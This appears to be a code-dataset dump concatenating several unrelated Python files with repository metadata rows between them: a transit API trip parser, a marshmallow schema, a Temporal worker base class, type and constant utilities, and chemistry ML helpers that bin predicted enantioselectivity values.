if isinstance(part, RideSegment):
interchange.destination = part[0].platform
else:
interchange.destination = part[0].origin
trip._parts.append(part)
interchange = self._parse_trip_interchange(routepart)
if isinstance(part, RideSegment):
if interchange is not None:
interchange.origin = part[-1].platform
trip._parts.append(interchange)
else:
if interchange is not None:
part.events = interchange.events
interchange = None
ticketlist = TicketList()
tickets = route.find('./itdFare/itdSingleTicket')
if tickets:
authority = tickets.attrib['net']
ticketlist.single = TicketData(authority,
tickets.attrib['unitsAdult'],
float(tickets.attrib['fareAdult']),
float(tickets.attrib['fareChild']))
if tickets.get('fareBikeAdult'):
ticketlist.bike = TicketData(authority,
tickets.attrib['unitsBikeAdult'],
float(tickets.attrib['fareBikeAdult']),
float(tickets.attrib['fareBikeChild']))
ticketlist.currency = tickets.attrib['currency']
ticketlist.level_name = tickets.attrib['unitName']
for ticket in tickets.findall('./itdGenericTicketList/itdGenericTicketGroup'):
t = TicketData()
name = ticket.find('./itdGenericTicket[ticket="TICKETTYPE"]/value')
if name is None or not name.text:
continue
authority = ticket.find('./itdGenericTicket[ticket="TARIFF_AUTHORITY"]/value')
if authority is not None and authority.text:
t.authority = authority.text
level = ticket.find('./itdGenericTicket[ticket="FARE_CATEGORY"]/value')
if level is not None and level.text:
t.level = level.text
prices = []
adult = ticket.find('./itdGenericTicket[ticket="TICKET_ID_ADULT"]/value')
if adult is not None and adult.text:
price = ticket.find('./itdGenericTicket[ticket="FARE_ADULT"]/value')
if price is not None and price.text:
prices.append(float(price.text))
child = ticket.find('./itdGenericTicket[ticket="TICKET_ID_CHILD"]/value')
if child is not None and child.text:
price = ticket.find('./itdGenericTicket[ticket="FARE_CHILD"]/value')
if price is not None and price.text:
prices.append(float(price.text))
if not prices:
continue
t.price = prices[0]
if len(prices) == 2:
t.price_child = prices[1]
ticketlist.other[name.text] = t
trip.tickets = ticketlist
trips.append(trip)
return trips
def _parse_trippart(self, data):
""" Parses itdPartialRoute into a RideSegment or Way """
points = [self._parse_ridepoint(point) for point in data.findall('./itdPoint')]
path = []
for coords in data.findall('./itdPathCoordinates/itdCoordinateBaseElemList/itdCoordinateBaseElem'):
path.append(Coordinates(float(coords.find('y').text) / 1000000, float(coords.find('x').text) / 1000000))
motdata = self._parse_ride(data.find('./itdMeansOfTransport'))
if motdata is None or data.attrib['type'] == 'IT':
type_ = data.find('./itdMeansOfTransport').attrib['type']
if type_ == '97':
# Nicht umsteigen!
return None
waytype = {
'98': 'walk',
'99': 'walk',
'100': 'walk',
'101': 'bike',
'104': 'car',
'105': 'taxi'
}[type_]
# 98 = gesicherter anschluss
way = Way(WayType(waytype), points[0].stop, points[1].stop)
way.distance = data.attrib.get('distance')
if way.distance is not None:
way.distance = float(way.distance)
duration = data.attrib.get('timeMinute', None)
if duration is not None:
way.duration = timedelta(minutes=int(duration))
if path:
way.path = path
return way
else:
ride, origin, destination = motdata
if data.find('./genAttrList/genAttrElem[value="HIGHSPEEDTRAIN"]') is not None:
ride.line.linetype = LineType('train.longdistance.highspeed')
elif data.find('./genAttrList/genAttrElem[value="LONG_DISTANCE_TRAIN"]') is not None:
ride.line.linetype = LineType('train.longdistance')
# Build Ride Objekt with known stops
for infotext in data.findall('./infoTextList/infoTextListElem'):
ride.infotexts.append(infotext)
first = last = None
waypoints = False
if data.find('./itdStopSeq'):
new_points = [self._parse_ridepoint(point)
for point in data.findall('./itdStopSeq/itdPoint')]
if not new_points or new_points[0].stop != new_points[0].stop:
new_points.insert(0, points[0])
if new_points[-1].stop != points[1].stop:
new_points.append(points[1])
points = new_points
waypoints = True
first = 0
last = -1
for i, p in enumerate(points):
if i > 0 and not waypoints:
ride.append(None)
ride.append(p)
if origin is not None:
if origin != ride[0].stop:
ride.prepend(None)
ride.prepend(RidePoint(Platform(origin)))
first += 2
else:
ride.prepend(None)
first += 1
if destination is not None:
if destination != ride[-1].stop:
ride.append(None)
ride.append(RidePoint(Platform(destination)))
last -= 2
else:
ride.append(None)
last -= 1
last += 1
segment = ride[first:last]
segment.set_path(path)
return segment
def _parse_trip_interchange(self, data):
""" Parses an optional interchange path of a itdPartialRoute into a Way """
info = data.find('./itdFootPathInfo')
if info is None:
return None
way = Way()
way.duration = timedelta(minutes=int(info.attrib.get('duration')))
path = []
for coords in data.findall('./itdInterchangePathCoordinates/itdPathCoordinates'
'/itdCoordinateBaseElemList/itdCoordinateBaseElem'):
path.append(Coordinates(float(coords.find('y').text) / 1000000, float(coords.find('x').text) / 1000000))
if path:
way.path = path
events = []
for event in data.findall('./itdFootPathInfo/itdFootPathElem'):
name = event.attrib['type'].lower()
direction = event.attrib['level'].lower()
if name in ('elevator', 'escalator', 'stairs') and direction in ('up', 'down'):
events.append(WayEvent(name, direction))
way.events = events
return way
def _parse_datetime(self, data):
""" Create a datetime from itdDate and itdTime """
d = data.find('./itdDate').attrib
t = data.find('./itdTime').attrib
# -1 means nope, there is no time known
if d['weekday'] == '-1' or d['day'] == '-1' or t['minute'] == '-1':
return None
# convert time – the EFA API likes to talk about 24:00, so we have to correct that.
result = datetime(int(d['year']), int(d['month']), int(d['day']), min(int(t['hour']), 23), int(t['minute']))
if int(t['hour']) == 24:
result += timedelta(hours=1)
return result
def _parse_ride(self, data):
""" Parse a itdServingLine Node into something nicer """
line = Line()
meta = MetaRide(line=line)
ride = Ride(meta=meta)
if 'motType' not in data.attrib:
return None
# determine Type
mottype = int(data.attrib['motType'])
line.linetype = LineType(('train.local', 'urban', 'metro', 'urban', 'tram',
'bus.city', 'bus.regional', 'bus.express', 'suspended',
'ship', 'dialable', 'other')[mottype])
train = data.find('./itdTrain')
traintype = (train is not None and train.get('type')) or data.attrib.get('trainType')
if traintype is not None and traintype not in ('RE', 'RB'):
line.linetype = LineType('train.longdistance.highspeed' if traintype in ('ICE', 'THA', 'TGV')
else 'train.longdistance')
# general Line and Ride attributes
diva = data.find('./motDivaParams')
if diva is not None:
line.network = diva.attrib['network']
line.id = ':'.join((diva.attrib['network'], diva.attrib['line'], diva.attrib['supplement'],
diva.attrib['direction'], diva.attrib['project']))
ridedir = diva.attrib['direction'].strip()
if ridedir:
meta.direction = ridedir
meta.number = self._get_attrib(data, 'tC', 'key')
if line.id is not None and meta.number is not None:
meta.id = '%s:%s' % (line.id, meta.number)
op = data.find('./itdOperator')
if op is not None:
line.operator = op.find('./name').text
# We behave different for trains and non-trains
notrain = data.find('./itdNoTrain')
if mottype == 0:
line.name = data.attrib['symbol']
line.product = self._get_attrib(data, 'trainName', 'productName')
if not line.product:
line.product = notrain.attrib['name']
# overrides the diva one
meta.number = data.attrib.get('trainNum', meta.number)
prefix = data.attrib.get('trainType', '')
line.shortname = (prefix + meta.number) if prefix else line.name
if not line.shortname:
train = data.find('./itdTrain')
if train is not None:
line.shortname = train.attrib['type']
if not line.name:
line.name = line.shortname
else:
line.product = data.attrib.get('productName', '')
if not line.product:
line.product = data.find('./itdNoTrain').attrib['name']
if line.product == 'Fernbus':
line.linetype = LineType('bus.longdistance')
line.shortname = data.attrib['symbol']
line.name = ('%s %s' % (line.product, line.shortname)).strip()
ride.canceled = (notrain.attrib.get('delay', '') == '-9999') if notrain else None
# origin and destination
origin = data.attrib.get('directionFrom')
origin = Stop(full_name=origin) if origin else None
destination = self._get_attrib(data, 'destination', 'direction')
destination = Stop(full_name=destination) if destination else None
if data.attrib.get('destID', ''):
destination.country = self._parse_stopid_country(data.attrib['destID'])
destination.id = int(data.attrib['destID'])
# route description
routedescription = data.find('./itdRouteDescText')
if routedescription is not None:
line.route = routedescription.text
return ride, origin, destination
def _parse_ridepoint(self, data):
""" Parse a trip Point into a RidePoint (including the Location) """
city = self._get_attrib(data, 'locality', 'place')
name = self._get_attrib(data, 'nameWO')
full_name = self._get_attrib(data, 'name', 'stopName')
if data.attrib['area'] == '' and data.attrib['stopID'] == '0':
return None
location = Stop(country=self._parse_stopid_country(data.attrib['stopID']), city=city,
name=name, full_name=full_name)
location.id = int(data.attrib['stopID'])
# get and clean the platform
platform_id = data.attrib['platform'].strip()
name_platform = platform_id or data.get('platformName')
match = re.search(r'[0-9].*$', data.attrib['platformName'])
name_platform = match.group(0) if match is not None else name_platform
full_platform = data.attrib['platformName'].strip() or name_platform
if name_platform == full_platform and 'pointType' in data.attrib:
full_platform = '%s %s' % (data.attrib['pointType'], name_platform)
platform = Platform(stop=location, name=name_platform, full_name=full_platform)
if platform_id:
platform.id = ':'.join((str(location.id), data.attrib['area'], platform_id))
ifopt = data.attrib.get('gid', '').split(':')
if len(ifopt) == 3:
location.country = ifopt[0]
location.ifopt = ':'.join(ifopt)
ifopt = data.attrib.get('pointGid', '').split(':')
if len(ifopt) == 5 and str(location.id).endswith(ifopt[2]):
if location.ifopt is None:
location.country = ifopt[0]
location.ifopt = ':'.join(ifopt[:3])
if full_platform is not None:
platform.ifopt = ':'.join(ifopt)
if data.attrib.get('x'):
platform.lat = float(data.attrib['y']) / 1000000
platform.lon = float(data.attrib['x']) / 1000000
result = RidePoint(platform)
result.arrival, result.departure, result.passthrough = self._parse_ridepoint_time(data)
return result
def _parse_ridepoint_time(self, data):
# There are three ways to describe the time
if data.attrib.get('usage', ''):
# Used for routes (only arrival or departure time)
times = []
if data.find('./itdDateTimeTarget'):
times.append(self._parse_datetime(data.find('./itdDateTimeTarget')))
if data.find('./itdDateTime'):
times.append(self._parse_datetime(data.find('./itdDateTime')))
plantime = None
expected_time = None
if len(times) > 0:
plantime = times[0]
if len(times) == 2:
expected_time = times[1]
if data.attrib['usage'] == 'departure':
return None, LiveTime(time=plantime, expected_time=expected_time), None
elif data.attrib['usage'] == 'arrival':
return LiveTime(time=plantime, expected_time=expected_time), None, None
elif 'countdown' in data.attrib:
# Used for departure lists
times = []
if data.find('./itdDateTime'):
times.append(self._parse_datetime(data.find('./itdDateTime')))
if data.find('./itdRTDateTime'):
times.append(self._parse_datetime(data.find('./itdRTDateTime')))
plantime = expected_time = None
if len(times) > 0:
plantime = times[0]
if len(times) == 2:
expected_time = times[1]
return None, LiveTime(time=plantime, expected_time=expected_time), None
else:
# Also used for routes (arrival and departure time – most times)
times = []
for itddatetime in data.findall('./itdDateTime'):
times.append(self._parse_datetime(itddatetime))
passthrough = not [t for t in times if t is not None]
arrival = departure = None
if len(times) > 0 and times[0] is not None:
delay = int(data.attrib.get('arrDelay', '-1'))
delay = timedelta(minutes=delay) if delay >= 0 else None
arrival = LiveTime(time=times[0], delay=delay)
if len(times) > 1 and times[1] is not None:
delay = int(data.attrib.get('depDelay', '-1'))
delay = timedelta(minutes=delay) if delay >= 0 else None
departure = LiveTime(time=times[1], delay=delay)
return arrival, departure, passthrough
| 5,358 | 33,969 | 23 |
5cfd69f29b2d309d326593310d7963a46110542e | 837 | py | Python | ceraon/api/v1/locations/schema.py | Rdbaker/Mealbound | 37cec6b45a632ac26a5341a0c9556279b6229ea8 | [
"BSD-3-Clause"
] | 1 | 2018-11-03T17:48:50.000Z | 2018-11-03T17:48:50.000Z | ceraon/api/v1/locations/schema.py | Rdbaker/Mealbound | 37cec6b45a632ac26a5341a0c9556279b6229ea8 | [
"BSD-3-Clause"
] | 3 | 2021-03-09T09:47:04.000Z | 2022-02-12T13:04:41.000Z | ceraon/api/v1/locations/schema.py | Rdbaker/Mealbound | 37cec6b45a632ac26a5341a0c9556279b6229ea8 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""Location schema."""
from marshmallow import Schema, fields, validates
from werkzeug.exceptions import BadRequest
from ceraon.constants import Errors
class LocationSchema(Schema):
"""A schema for a Location model."""
created_at = fields.DateTime(dump_only=True)
name = fields.String(required=True, load_only=True)
id = fields.UUID()
address = fields.Str()
latitude = fields.Float()
longitude = fields.Float()
private_fields = ['address', 'latitude', 'longitude']
class Meta:
"""The mata class for the location schema."""
type_ = 'location'
strict = True
@validates('name')
def validate_name(self, value):
"""Validate the name of the location."""
if not value:
raise BadRequest(Errors.LOCATION_NAME_MISSING)
| 26.15625 | 58 | 0.655914 | # -*- coding: utf-8 -*-
"""Location schema."""
from marshmallow import Schema, fields, validates
from werkzeug.exceptions import BadRequest
from ceraon.constants import Errors
class LocationSchema(Schema):
"""A schema for a Location model."""
created_at = fields.DateTime(dump_only=True)
name = fields.String(required=True, load_only=True)
id = fields.UUID()
address = fields.Str()
latitude = fields.Float()
longitude = fields.Float()
private_fields = ['address', 'latitude', 'longitude']
class Meta:
"""The mata class for the location schema."""
type_ = 'location'
strict = True
@validates('name')
def validate_name(self, value):
"""Validate the name of the location."""
if not value:
raise BadRequest(Errors.LOCATION_NAME_MISSING)
| 0 | 0 | 0 |
a48761cda1ea411c2b818a7c48af1d5a1062fc80 | 24 | py | Python | distgen/_version.py | rsintheta/distgen | 5ee7c48a6261f65b3d1658bb66511b9ef1cd02cd | [
"Apache-2.0"
] | null | null | null | distgen/_version.py | rsintheta/distgen | 5ee7c48a6261f65b3d1658bb66511b9ef1cd02cd | [
"Apache-2.0"
] | null | null | null | distgen/_version.py | rsintheta/distgen | 5ee7c48a6261f65b3d1658bb66511b9ef1cd02cd | [
"Apache-2.0"
] | null | null | null |
__version__ = '0.4.4'
| 6 | 21 | 0.583333 |
__version__ = '0.4.4'
| 0 | 0 | 0 |
a1b004e47c4537ad22d3c3e3ead762da0229a0e5 | 1,101 | py | Python | src/workflows/worker.py | turnbros/paul | 42699b4d13386b39f60a4aacede64dc4d1415ea6 | [
"CC-BY-4.0"
] | null | null | null | src/workflows/worker.py | turnbros/paul | 42699b4d13386b39f60a4aacede64dc4d1415ea6 | [
"CC-BY-4.0"
] | null | null | null | src/workflows/worker.py | turnbros/paul | 42699b4d13386b39f60a4aacede64dc4d1415ea6 | [
"CC-BY-4.0"
] | 1 | 2022-01-10T19:51:38.000Z | 2022-01-10T19:51:38.000Z | import logging
from util import config
from abc import ABC, abstractmethod
from temporal.workflow import workflow_method
logging.basicConfig(level=logging.DEBUG)
import functools
| 19.315789 | 57 | 0.786558 | import logging
from util import config
from abc import ABC, abstractmethod
from temporal.workflow import workflow_method
logging.basicConfig(level=logging.DEBUG)
import functools
def example_workflow_method(queue_name):
    """Decorator factory that tags a callable with a task-queue name.

    The returned wrapper only prints ``queue_name`` when invoked; the
    wrapped function itself is never called (this is an example stub).
    """
    def decorate(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            print(queue_name)
        return wrapper
    return decorate
class TemporalWorker(ABC):
    """Base class for Temporal workers.

    Subclasses provide a task-queue ``name`` and an async ``worker_workflow``
    implementation; :meth:`execute` wraps the workflow in a Temporal
    ``workflow_method`` bound to that queue and runs it.
    """

    @property
    def paul_config(self):
        """A freshly loaded application configuration object."""
        return config.Configuration()

    @property
    def temporal_config(self):
        """The Temporal section of the application configuration."""
        return self.paul_config.read_temporal_config()

    @property
    def worker_config(self):
        """The configuration block registered under this worker's name."""
        return self.paul_config.read_workflow_config(self.name)

    @property
    @abstractmethod
    def name(self):
        """The task-queue name of this worker; must be overridden."""
        raise NotImplementedError

    @abstractmethod
    async def worker_workflow(self, payload: dict):
        """The worker's workflow body; must be overridden."""
        raise NotImplementedError

    async def execute(self, payload: dict):
        """Run this worker's workflow on its task queue.

        Bug fix: the inner workflow previously declared an extra ``self``
        parameter and was called with only ``payload`` (binding the payload
        dict to ``self`` and raising TypeError), and neither coroutine was
        awaited, so the workflow never actually ran.
        """
        @workflow_method(task_queue=self.name)
        async def execute_workflow(payload: dict):
            return await self.worker_workflow(payload)
        return await execute_workflow(payload)
| 631 | 227 | 45 |
4622d9b42469a4b6e217b79ba18cfcdbef274db4 | 4,955 | py | Python | ycyc/base/typeutils.py | MrLYC/ycyc | 1938493294fbad3a461cc3a752c5385d30a6e51d | [
"MIT"
] | 22 | 2015-07-21T03:15:36.000Z | 2021-02-23T07:58:03.000Z | ycyc/base/typeutils.py | MrLYC/ycyc | 1938493294fbad3a461cc3a752c5385d30a6e51d | [
"MIT"
] | 3 | 2016-03-20T12:06:07.000Z | 2018-01-16T10:34:19.000Z | ycyc/base/typeutils.py | MrLYC/ycyc | 1938493294fbad3a461cc3a752c5385d30a6e51d | [
"MIT"
] | 3 | 2015-05-08T00:55:38.000Z | 2017-02-25T03:30:14.000Z | #!/usr/bin/env python
# encoding: utf-8
from itertools import groupby
from operator import itemgetter
def get_real_bases(bases):
    """
    Get real bases for a ``type()`` call.
    >>> get_real_bases(None) #=> (object,)
    >>> get_real_bases(TypeA) #=> (TypeA,)
    >>> get_real_bases([TypeA, TypeB]) #=> (TypeA, TypeB)
    :param bases: type or type sequence (or None)
    :return: a non-empty tuple of base classes
    """
    # None means "no explicit bases": default to plain ``object``.
    if bases is None:
        return (object,)
    # A bare class is accepted as a convenience and wrapped in a tuple.
    if isinstance(bases, type):
        bases = (bases,)
    return tuple(bases)
def subtype(name, bases=None, attrs=None):
    """
    An easier way to create a type inherited from bases (default: object)
    with the specified attrs.
    :param name: name of the new type
    :param bases: base class(es) of the new type
    :param attrs: class attributes of the new type
    :return: the newly created class
    """
    return type(name, get_real_bases(bases), dict(attrs or {}))
class TypeFactory(object):
    """
    Create your type from this factory.
    >>> types_factory.NewType()
    equals:
    >>> subtype("NewType")
    """
    # NOTE(review): this copy contains no ``__getattr__`` hook, so the
    # attribute-based construction shown above is not actually implemented
    # here -- confirm against the full module.
# Shared module-level instance for attribute-style type creation.
types_factory = TypeFactory()
def subexception(name, bases=None, attrs=None):
    """
    An easier way to create an Exception subclass.
    :param name: name of the new exception
    :param bases: base class(es); falls back to ``Exception`` when falsy
    :param attrs: class attributes of the new exception
    """
    return subtype(name, bases or [Exception], attrs)
class ExceptionFactory(object):
    """
    Create your exception type via this factory.
    >>> exceptions_factory.NewError()
    equals:
    >>> subexception("NewError")
    """
    # NOTE(review): this copy contains no ``__getattr__`` hook, so the
    # attribute-based construction shown above is not implemented here.
# Shared module-level instance for attribute-style exception creation.
exceptions_factory = ExceptionFactory()
class SimpleExceptions(object):
    """
    Create and cache simple exception classes.
    """
    # NOTE(review): the lazy ``__getattr__`` implementation is missing from
    # this copy; as written the class has no behavior.
def freezed_attrs(attrs):
    """
    Class decorator declaring that the attributes in *attrs* are freezed:
    each may be assigned exactly once (normally during ``__init__``), and
    any other assignment raises ``AttributeError``.
    :param attrs: attribute name list
    :return: a decorator producing a subclass with a guarded ``__setattr__``
    """
    # Bug fix: this function previously returned ``setattr_hook`` without
    # ever defining it, so every call raised NameError.
    def setattr_hook(cls):
        def __setattr__(self, name, val):
            # Reject names outside the whitelist and re-assignment of names
            # that have already been set once.
            if name not in attrs or hasattr(self, name):
                raise AttributeError("attribute %s is not writable" % name)
            return super(cls, self).__setattr__(name, val)
        return subtype(
            cls.__name__, cls,
            {
                "__doc__": cls.__doc__,
                "__setattr__": __setattr__,
            }
        )
    return setattr_hook
class Constants(object):
    """
    The base class of constants.
    """
    # NOTE(review): this copy defines no behavior; the construction logic
    # present in the full module is absent here.
def constants(**kwg):
    """
    Declare some constants.
    Keyword arguments become the constant names and values.
    """
    return Constants(kwg, {"name": "ConstantSet"})
def enums(*values):
    """
    Declare some enumerations: each name maps to its positional index.
    """
    # NOTE(review): ``_enums_getitem_hook`` is not defined in this copy of
    # the module, so calling this as-is raises NameError -- confirm against
    # the full source.
    return Constants(
        {k: i for i, k in enumerate(values)},
        {"name": "EnumerationSet", "getitem_hook": _enums_getitem_hook}
    )
| 25.152284 | 75 | 0.587891 | #!/usr/bin/env python
# encoding: utf-8
from itertools import groupby
from operator import itemgetter
def get_real_bases(bases):
    """Normalize the *bases* argument into a tuple of base classes.

    ``None`` yields ``(object,)``, a single class is wrapped into a
    one-element tuple, and any other sequence is converted to a tuple.

    :param bases: type or type sequence (or None)
    """
    if bases is None:
        bases = [object]
    elif isinstance(bases, type):
        bases = [bases]
    return tuple(bases)
def subtype(name, bases=None, attrs=None):
    """Create a new class *name* deriving from *bases* with *attrs*.

    ``bases=None`` means inherit from ``object``; a falsy *attrs* means an
    empty class dictionary.
    """
    real_bases = get_real_bases(bases)
    namespace = dict(attrs) if attrs else {}
    return type(name, real_bases, namespace)
class TypeFactory(object):
    """Attribute-based sugar for :func:`subtype`.

    Accessing any attribute returns a builder for a class of that name::

        types_factory.NewType()   # same as subtype("NewType")
    """

    def __getattr__(self, name):
        def build(bases=None, attrs=None):
            return subtype(name, bases, attrs)
        return build
# Shared module-level instance for attribute-style type creation.
types_factory = TypeFactory()
def subexception(name, bases=None, attrs=None):
    """Create a new exception class named *name*.

    Falls back to ``Exception`` as the base when *bases* is falsy.
    """
    parents = bases if bases else [Exception]
    return subtype(name, parents, attrs)
class ExceptionFactory(object):
    """Attribute-based sugar for :func:`subexception`.

    Accessing any attribute returns a builder for an exception class::

        exceptions_factory.NewError()   # same as subexception("NewError")
    """

    def __getattr__(self, name):
        def build(bases=None, attrs=None):
            return subexception(name, bases, attrs)
        return build
# Shared module-level instance for attribute-style exception creation.
exceptions_factory = ExceptionFactory()
class SimpleExceptions(object):
    """Lazily create simple exception classes and cache them.

    The first access of any attribute builds an ``Exception`` subclass of
    that name; caching it on the instance means ``__getattr__`` only fires
    once per name.
    """

    def __getattr__(self, name):
        cls = subexception(name)
        # Cache on the instance so later lookups bypass __getattr__.
        setattr(self, name, cls)
        return cls
def freezed_attrs(attrs):
    """Class decorator freezing the attributes listed in *attrs*.

    Each listed attribute can be assigned exactly once (normally during
    ``__init__``); names outside the list are rejected outright.

    :param attrs: attribute name list
    """
    def decorate(cls):
        def __setattr__(self, name, val):
            if name not in attrs or hasattr(self, name):
                raise AttributeError("attribute %s is not writable" % name)
            return super(cls, self).__setattr__(name, val)
        namespace = {
            "__doc__": cls.__doc__,
            "__setattr__": __setattr__,
        }
        # Subclass keeps the original name and docstring but installs the
        # guarded __setattr__.
        return subtype(cls.__name__, cls, namespace)
    return decorate
class Constants(object):
    """
    The base class of constants
    """
    def __new__(cls, mappings, attrs):
        # Reverse index: value -> tuple of every name mapped to that value.
        # NOTE(review): ``groupby`` only merges *adjacent* equal values and
        # the items are not sorted by value first, so names sharing a value
        # are only grouped when adjacent in insertion order -- confirm this
        # is intended.
        consts_index = {
            val: tuple(i[0] for i in item)
            for val, item in groupby(list(mappings.items()), itemgetter(1))
        }
        # Name of the generated subclass; defaults to this class's name.
        __name__ = attrs.pop("name", cls.__name__)
        def __iter__(self):
            return iter(mappings.items())
        # Each dunder below may be wrapped by an optional "*_hook" in attrs;
        # the pops also mutate the caller-supplied ``attrs`` dict.
        hook = attrs.pop("iter_hook", None)
        if hook:
            __iter__ = hook(__iter__)
        def __getitem__(self, val):
            # Look up the name(s) registered for a value (None when absent).
            return consts_index.get(val)
        hook = attrs.pop("getitem_hook", None)
        if hook:
            __getitem__ = hook(__getitem__)
        def __len__(self):
            return len(mappings)
        hook = attrs.pop("len_hook", None)
        if hook:
            __len__ = hook(__len__)
        def __setattr__(self, name, val):
            # Constants may only be assigned once (done in __init__) and
            # only for names present in the original mappings.
            if name not in mappings or hasattr(self, name):
                raise AttributeError("attribute %s is not writable" % name)
            return super(cls, self).__setattr__(name, val)
        hook = attrs.pop("setattr_hook", None)
        if hook:
            __setattr__ = hook(__setattr__)
        # Instantiate a dynamically built subclass carrying the closures
        # above; ``subtype`` is defined earlier in this module.
        constants = super(Constants, cls).__new__(subtype(
            __name__, cls,
            {
                "__doc__": cls.__doc__,
                "__iter__": __iter__,
                "__getitem__": __getitem__,
                "__len__": __len__,
                "__setattr__": __setattr__,
            }
        ))
        return constants
    def __init__(self, mappings, attrs):
        # Populate the instance; each assignment goes through the guarded
        # __setattr__ installed by __new__, so every name is set exactly once.
        for k, v in list(mappings.items()):
            setattr(self, k, v)
    def __getitem__(self, name):
        # Placeholder; the real implementation is injected by __new__ on the
        # generated subclass.
        pass
    def __len__(self):
        pass
    def __iter__(self):
        pass
def constants(**kwg):
    """Declare a set of named constants.

    Keyword arguments become read-only attributes on the returned object.
    """
    options = {"name": "ConstantSet"}
    return Constants(kwg, options)
def _enums_getitem_hook(method):
def getitem(self, name):
return method(self, name)[0]
return getitem
def enums(*values):
    """Declare an enumeration: each name maps to its positional index."""
    mapping = {name: index for index, name in enumerate(values)}
    options = {"name": "EnumerationSet", "getitem_hook": _enums_getitem_hook}
    return Constants(mapping, options)
| 2,396 | 0 | 261 |
71de2eae5aee65bc132d29967be856043a214997 | 6,807 | py | Python | notebook/script/MachineLearning.py | licheng-xu-echo/SyntheticSpacePrediction | 986b6d010b10c825121452880aecf8e195793a13 | [
"MIT"
] | null | null | null | notebook/script/MachineLearning.py | licheng-xu-echo/SyntheticSpacePrediction | 986b6d010b10c825121452880aecf8e195793a13 | [
"MIT"
] | null | null | null | notebook/script/MachineLearning.py | licheng-xu-echo/SyntheticSpacePrediction | 986b6d010b10c825121452880aecf8e195793a13 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 25 21:00:31 2022
@author: LiCheng_Xu
"""
import numpy as np
from .TargetTransformation import ddG2ee
import matplotlib.pyplot as plt
from scipy.interpolate import make_interp_spline
from sklearn.model_selection import KFold
| 41.506098 | 117 | 0.58763 | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 25 21:00:31 2022
@author: LiCheng_Xu
"""
import numpy as np
from .TargetTransformation import ddG2ee
import matplotlib.pyplot as plt
from scipy.interpolate import make_interp_spline
from sklearn.model_selection import KFold
def std_error(truth, pred):
    """Sample standard error between ground truth and predictions.

    Computes ``sqrt(sum((truth - pred)**2) / (n - 1))`` with
    ``n = len(truth)``.
    """
    residual = truth - pred
    return np.sqrt(np.sum(residual ** 2) / (len(truth) - 1))
def genCountMap(_smi_set,synthetic_space,point_pred_map,point_error_map,species='TDG'):
    """Bucket predicted ee values into 10%-wide bins per SMILES species.

    :param _smi_set: iterable of the SMILES strings found in the
        ``species`` column.
    :param synthetic_space: pandas DataFrame, one row per predicted point;
        column ``species`` holds each row's SMILES.
    :param point_pred_map: index -> predicted ddG for every point.
    :param point_error_map: index -> prediction error (same indices).
    :param species: column name to group by (default ``'TDG'``).
    :return: tuple ``(count, upper, lower, average)`` of nested dicts
        ``{smiles: {bin_upper_bound: count}}``; *upper*/*lower* bin the
        prediction shifted by +/- its error, *average* is the integer mean
        of the three counts per bin.
    """
    # Convert every predicted ddG to an ee value at 60 C (333.15 K).
    # NOTE(review): ee is presumably a fraction in [0, 1) -- a value of
    # exactly 1 would fall outside every strict "< th" bin below; confirm
    # against TargetTransformation.ddG2ee.
    pred_space_ee = []
    pred_space_ddG = []
    pred_space_error = []
    for i in range(len(point_pred_map)):
        pred_ddG = point_pred_map[i]
        pred_error = point_error_map[i]
        pred_ee = ddG2ee(pred_ddG,60+273.15)
        pred_space_ddG.append(pred_ddG)
        pred_space_ee.append(pred_ee)
        pred_space_error.append(pred_error)
    # One histogram per SMILES; the ascending dict insertion order is what
    # makes the "first threshold greater than the value" scan below correct.
    _count_map = {}
    _up_count_map = {}
    _down_count_map = {}
    for _smi in _smi_set:
        _count_map[_smi] = {0.1:0,0.2:0,0.3:0,0.4:0,0.5:0,
                            0.6:0,0.7:0,0.8:0,0.9:0,1:0}
        _up_count_map[_smi] = {0.1:0,0.2:0,0.3:0,0.4:0,0.5:0,
                               0.6:0,0.7:0,0.8:0,0.9:0,1:0}
        _down_count_map[_smi] = {0.1:0,0.2:0,0.3:0,0.4:0,0.5:0,
                                 0.6:0,0.7:0,0.8:0,0.9:0,1:0}
    for i in range(len(synthetic_space)):
        _smi = synthetic_space.iloc[i][species]
        tmp_ee = pred_space_ee[i]
        tmp_ddG = pred_space_ddG[i]
        tmp_error = pred_space_error[i]
        # Optimistic / pessimistic ee from shifting ddG by its error.
        tmp_ee_up = ddG2ee(tmp_ddG+tmp_error,60+273.15)
        tmp_ee_down = ddG2ee(tmp_ddG-tmp_error,60+273.15)
        # Drop each value into the first (smallest) bin that contains it.
        for th in _count_map[_smi]:
            if tmp_ee < th:
                _count_map[_smi][th] += 1
                break
        for th in _up_count_map[_smi]:
            if tmp_ee_up < th:
                _up_count_map[_smi][th] += 1
                break
        for th in _down_count_map[_smi]:
            if tmp_ee_down < th:
                _down_count_map[_smi][th] += 1
                break
    # Integer average of the three histograms, bin by bin.
    _ave_count_map = {}
    for smi in _count_map:
        _ave_count_map[smi] = {}
        for key in _count_map[smi]:
            ave = int((_count_map[smi][key] + _up_count_map[smi][key] + _down_count_map[smi][key])/3)
            _ave_count_map[smi][key] = ave
    return _count_map,_up_count_map,_down_count_map,_ave_count_map
def vis_distribution(ave_count_map,sel_smi_color_map,title=''):
    """Plot smoothed ee-bin count curves for a selection of species.

    :param ave_count_map: ``{smiles: {bin: count}}`` as built by genCountMap.
    :param sel_smi_color_map: ``{smiles: matplotlib color}``; only these
        species are drawn, one curve each.
    :param title: optional figure title.
    """
    plt.figure(figsize=(14,5))
    # Bin centres in percent; counts are spline-interpolated to 100 samples.
    x = np.array([10,20,30,40,50,60,70,80,90,100])
    x_smooth = np.linspace(x.min(), x.max(), 100)
    for smi in sel_smi_color_map:
        y_ave = np.array([ave_count_map[smi][key] for key in [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1]])
        y_ave_smooth = make_interp_spline(x,y_ave)(x_smooth)
        # The interpolating spline can dip below zero between data points;
        # clamp it so the filled area stays non-negative.
        y_ave_smooth = np.where(y_ave_smooth>0,y_ave_smooth,0)
        plt.plot(x_smooth, y_ave_smooth,c=sel_smi_color_map[smi],alpha=0.9)
        plt.fill_between(x_smooth,y_ave_smooth,np.zeros(len(y_ave_smooth)),color=sel_smi_color_map[smi],alpha=0.1)
    plt.xticks([10,20,30,40,50,60,70,80,90,100],['<10','10-20','20-30','30-40','40-50',
                                                 '50-60','60-70','70-80','80-90','>90'],fontsize=14)
